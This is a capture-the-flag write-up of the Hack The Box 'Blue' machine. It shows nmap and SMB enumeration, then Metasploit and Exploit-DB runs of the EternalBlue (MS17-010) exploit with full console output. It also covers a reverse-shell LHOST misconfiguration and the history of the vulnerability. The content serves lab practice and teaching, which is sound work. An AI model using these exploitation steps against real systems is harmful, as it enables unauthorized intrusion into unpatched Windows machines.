Hack The Box – Blue writeup

This box is very easy, ideal for whoever is starting with hacking. This is a walkthrough and my personal experience with the HTB – Blue box. I’m gonna show how I have scanned and enumerated the system, what I have tools I have used to root the box and a common pitfall of people approaching Metasploit for the first time. I’ll also explain what famous vulnerability this box is based on.

Scanning and enumeration

I started with a classic NMap scan of all the ports of the machine:

root@kali:/home/kali# nmap -T4 -A -p- 10.10.10.40

Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-28 10:41 EST
Nmap scan report for 10.10.10.40
Host is up (0.051s latency).
Not shown: 65526 closed ports
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49156/tcp open  msrpc        Microsoft Windows RPC
49157/tcp open  msrpc        Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=11/28%OT=135%CT=1%CU=39401%PV=Y%DS=2%DC=T%G=Y%TM=5FC27
OS:016%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=2%ISR=10D%TI=I%CI=I%II=I%SS=S%T
OS:S=7)OPS(O1=M54DNW8ST11%O2=M54DNW8ST11%O3=M54DNW8NNT11%O4=M54DNW8ST11%O5=
OS:M54DNW8ST11%O6=M54DST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2
OS:000)ECN(R=Y%DF=Y%T=80%W=2000%O=M54DNW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A
OS:=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=
OS:Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%R
OS:D=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=
OS:0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U
OS:1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DF
OS:I=N%T=80%CD=Z)

Network Distance: 2 hops
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1m05s, deviation: 2s, median: 1m03s
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: haris-PC
|   NetBIOS computer name: HARIS-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2020-11-28T15:44:16+00:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-11-28T15:44:17
|_  start_date: 2020-11-28T15:41:38

TRACEROUTE (using port 3389/tcp)
HOP RTT      ADDRESS
1   47.74 ms 10.10.14.1
2   48.03 ms 10.10.10.40

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 126.71 seconds

It looked like I was dealing with Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1), with SMB protocol – Server Message Block, which is a communication protocol used by windows systems to provide access to shared files, printers and ports. SMB used to run on top of Netbios (an older transport layer) on port 139, but after Windows 2000 it started to use the TCP protocol on port 445.

I wanted to see what else I could gather from the SMB service, if there were folders that allowed anonymous logins for example, which folders were available, etc. So I’ve connected to it using smbclient on Kali:

root@kali:/home/kali# smbclient -L \\\.10.10.40\\
Enter WORKGROUP\root's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        Share           Disk      
        Users           Disk      
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.40 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

Trying to connect to those shares through smbclient didn’t work.

I’ve started to look around for potential exploits related to the OS / services on this box and found a couple of interesting things:
https://www.exploit-db.com/exploits/42315 (python script for EternalBlue’ SMB Remote Code Execution (MS17-010))
https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue/ (metasploit module for MS17-010)

Exploitation

Searching on Google for MS17-010, and for anything else related to Windows 7 Professional 7601 Service Pack 1 and SMB,  I’ve found a metasploit module that seemed good for this machine.

So I tried it but it didn’t work:

msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 192.168.1.57:4444 
[*] 10.10.10.40:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.10.40:445       - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.10.40:445       - Scanned 1 of 1 hosts (100% complete)
[*] 10.10.10.40:445 - Connecting to target for exploitation.
[+] 10.10.10.40:445 - Connection established for exploitation.
[+] 10.10.10.40:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.10.40:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.10.40:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.10.10.40:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.10.10.40:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
[+] 10.10.10.40:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.10.40:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.10.40:445 - Sending all but last fragment of exploit packet
[*] 10.10.10.40:445 - Starting non-paged pool grooming
[+] 10.10.10.40:445 - Sending SMBv2 buffers
[+] 10.10.10.40:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.10.40:445 - Sending final SMBv2 buffers.
[*] 10.10.10.40:445 - Sending last fragment of exploit packet!
[*] 10.10.10.40:445 - Receiving response from exploit packet
[+] 10.10.10.40:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.10.40:445 - Sending egg to corrupted connection.
[*] 10.10.10.40:445 - Triggering free of corrupted buffer.
[-] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 10.10.10.40:445 - Connecting to target for exploitation.
[+] 10.10.10.40:445 - Connection established for exploitation.
[+] 10.10.10.40:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.10.40:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.10.40:445 - 0x00000000  57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73  Windows 7 Profes
[*] 10.10.10.40:445 - 0x00000010  73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76  sional 7601 Serv
[*] 10.10.10.40:445 - 0x00000020  69 63 65 20 50 61 63 6b 20 31                    ice Pack 1      
[+] 10.10.10.40:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.10.40:445 - Trying exploit with 17 Groom Allocations.
[*] 10.10.10.40:445 - Sending all but last fragment of exploit packet
[*] 10.10.10.40:445 - Starting non-paged pool grooming
[+] 10.10.10.40:445 - Sending SMBv2 buffers
[+] 10.10.10.40:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.10.40:445 - Sending final SMBv2 buffers.
[*] 10.10.10.40:445 - Sending last fragment of exploit packet!
[*] 10.10.10.40:445 - Receiving response from exploit packet
[-] 10.10.10.40:445 - Did not receive a response from exploit packet
[*] 10.10.10.40:445 - Sending egg to corrupted connection.
[-] 10.10.10.40:445 - Errno::ECONNRESET: Connection reset by peer
[*] Exploit completed, but no session was created.
msf5 exploit(windows/smb/ms17_010_eternalblue) >

 

I’ve then tried using a python script for the same vulnerability: MS17-010 EternalBlue, but it gave an error:

kali@kali:~/Downloads$ python3 42315.py 10.10.10.40
Target OS: Windows 7 Professional 7601 Service Pack 1
Not found accessible named pipe
Done

 

Another metasploit module for the same vulnerability didn’t work:

msf5 exploit(windows/smb/ms17_010_psexec) > exploit

[*] Started reverse TCP handler on 192.168.1.57:4444 
[*] 10.10.10.40:445 - Target OS: Windows 7 Professional 7601 Service Pack 1
[-] 10.10.10.40:445 - Timeout::Error
[-] 10.10.10.40:445 - execution expired
[-] 10.10.10.40:445 - /usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.13/lib/rex/sync/thread_safe.rb:36:in `select'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.13/lib/rex/sync/thread_safe.rb:36:in `select'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.13/lib/rex/io/stream.rb:75:in `rescue in read'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.13/lib/rex/io/stream.rb:69:in `read'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.13/lib/rex/io/stream.rb:159:in `block in timed_read'
/usr/lib/ruby/2.7.0/timeout.rb:110:in `timeout'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/rex-core-0.1.13/lib/rex/io/stream.rb:158:in `timed_read'
/usr/share/metasploit-framework/lib/rex/proto/smb/client.rb:73:in `smb_recv'
/usr/share/metasploit-framework/lib/msf/core/exploit/smb/client/psexec_ms17_010.rb:889:in `recv_transaction_data'
/usr/share/metasploit-framework/lib/msf/core/exploit/smb/client/psexec_ms17_010.rb:527:in `align_transaction_and_leak'
/usr/share/metasploit-framework/lib/msf/core/exploit/smb/client/psexec_ms17_010.rb:386:in `block in exploit_matched_pairs'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activesupport-4.2.11.3/lib/active_support/core_ext/range/each.rb:7:in `each'
/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activesupport-4.2.11.3/lib/active_support/core_ext/range/each.rb:7:in `each_with_time_with_zone'
/usr/share/metasploit-framework/lib/msf/core/exploit/smb/client/psexec_ms17_010.rb:381:in `exploit_matched_pairs'
/usr/share/metasploit-framework/lib/msf/core/exploit/smb/client/psexec_ms17_010.rb:44:in `eternal_pwn'
/usr/share/metasploit-framework/modules/exploits/windows/smb/ms17_010_psexec.rb:110:in `exploit'
/usr/share/metasploit-framework/lib/msf/core/exploit_driver.rb:215:in `job_run_proc'
/usr/share/metasploit-framework/lib/msf/core/exploit_driver.rb:169:in `run'
/usr/share/metasploit-framework/lib/msf/base/simple/exploit.rb:140:in `exploit_simple'
/usr/share/metasploit-framework/lib/msf/base/simple/exploit.rb:164:in `exploit_simple'
/usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:55:in `exploit_single'
/usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:201:in `cmd_exploit'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:523:in `run_command'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:474:in `block in run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:468:in `each'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:468:in `run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:158:in `run'
/usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'
/usr/share/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
/usr/bin/msfconsole:23:in `<main>'
[*] Exploit completed, but no session was created.

 

sf5 auxiliary(scanner/smb/smb2) > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting                                                 Required  Description
   ----         ---------------                                                 --------  -----------
   CHECK_ARCH   true                                                            no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                                            no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   false                                                           no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS                                                                       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT        445                                                             yes       The SMB service port (TCP)
   SMBDomain    .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                      no        The password for the specified username
   SMBUser                                                                      no        The username to authenticate as
   THREADS      1                                                               yes       The number of concurrent threads (max one per host)

msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhost 10.10.10.40
rhost => 10.10.10.40
msf5 auxiliary(scanner/smb/smb_ms17_010) > run

[+] 10.10.10.40:445       - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.10.40:445       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/smb_ms17_010) > set check_pipe true
check_pipe => true
msf5 auxiliary(scanner/smb/smb_ms17_010) > options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name         Current Setting                                                 Required  Description
   ----         ---------------                                                 --------  -----------
   CHECK_ARCH   true                                                            no        Check for architecture on vulnerable hosts
   CHECK_DOPU   true                                                            no        Check for DOUBLEPULSAR on vulnerable hosts
   CHECK_PIPE   true                                                            no        Check for named pipe on vulnerable hosts
   NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS       10.10.10.40                                                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT        445                                                             yes       The SMB service port (TCP)
   SMBDomain    .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                      no        The password for the specified username
   SMBUser                                                                      no        The username to authenticate as
   THREADS      1                                                               yes       The number of concurrent threads (max one per host)

msf5 auxiliary(scanner/smb/smb_ms17_010) > run

[+] 10.10.10.40:445       - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[+] 10.10.10.40:445       - Named pipe found: \netlogon
[*] 10.10.10.40:445       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

 

A common mistake

I knew that the machine was vulnerable to EternalBlue because the version of the OS and services on this machine matched the ones that the info online shows. And as you can see from the above results even that other tool confirmed that the machine should have been vulnerable to Eternal Blue. So what went wrong?

It was the first time I was using Metasploit through a VPN to test a target machine and there’s an issue that’s quite common among beginners (and not):

if we are testing a box in our local network, for example a metasploitable machine in a virtual machine or on another laptop in our network, we usually have a local IP address (something like 192.168.0.xx).

When connecting to another network, like via VPN like in the case of Hack The Box, we may use another interface to connect that has its own IP, which in the case of HTB is something like 10.10.xx.xx.

But when Metasploit sets up a module to be used, it sets as a standard the local IP address (starting with 192.168.), rather than the VPN one. Sometimes it’s tricky because you load the options of a module and all is good. Then you set the payload (which usually has its own LHOST to be set) and that one has your 192.168.0.xx address. So if you forget to check again the options, like often happens, you would make the same mistake that I did with this box.

So after checking my previous logs, I noticed that the LHOST of the first time I’ve run the ms17_010_eternalblue exploit was 192.18.1.57. Re-running the script with the correct local IP instead was successful and BOOM! I got my root access to the box.

At that point it was just a matter of looking for the user.txt and root.txt files that had the flags inside them.

eternalblue exploit

EternalBlue: What is it?

Hack The Box machines (and if you did some CTFs, you should have realised that’s a common thing) often have names that hint to the topic of that machine. In this case the box ‘Blue’ was about the famous Eternal Blue.

EternalBlue exploits a vulnerability (CVE-2017-0144 in the CVE catalogue and called MS17-010 by Microsoft) rose to prominance in 2017 when the Shadow Brokers brought it to light, and was later used in that year by the WannaCry ransomwere. Allegedly this exploit was developed by the NSA.

Simply put this exploit works by using SMBv1 vulnerabilities based on how Windows handles specially crafted packets from attackers, leveraging 3 different bugs.

Microsoft released a patch for this vulnerability in April 2017, one month before the Shadow Brokers tweet that made public EternalBlue, but it still managed to do a lot of damage because often times people (and especially organizations) don’t patch their machines in a timely fashion.

For a more technical explanation you could read this article.

 

I have a lot of other writeups for HackTheBox machines that I still have to publish, and I’ll try to do it as soon as possible, so  if you are interested in this type of content keep an eye out for future articles or take a look around my website.